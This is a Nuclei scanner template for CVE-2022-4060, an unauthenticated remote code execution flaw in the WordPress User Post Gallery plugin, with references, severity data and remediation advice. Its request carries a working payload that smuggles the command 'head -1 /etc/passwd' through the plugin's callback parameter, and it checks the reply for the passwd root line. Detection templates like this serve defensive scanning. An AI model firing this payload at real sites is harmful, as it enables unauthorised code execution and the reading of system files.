nuclei-templates/http/cves/2022/CVE-2022-4060.yaml

56 lines
1.9 KiB
YAML

id: CVE-2022-4060
info:
name: WordPress User Post Gallery <=2.19 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
remediation: |
Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e
- https://wordpress.org/plugins/wp-upg/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4060
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4060
cwe-id: CWE-94
epss-score: 0.33993
epss-percentile: 0.9657
cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: odude
product: user_post_gallery
framework: wordpress
tags: unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: word
part: body
words:
- "recordsFiltered"
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100eaada53f34b34d7edd0a9c1abb6442eae8606ebd0d99992c5f8cf19a894930e0022007defae03e2885a304238f3696e44d443abe5246d89df082652670f914d4f513:922c64590222798bb761d5b6d8e72950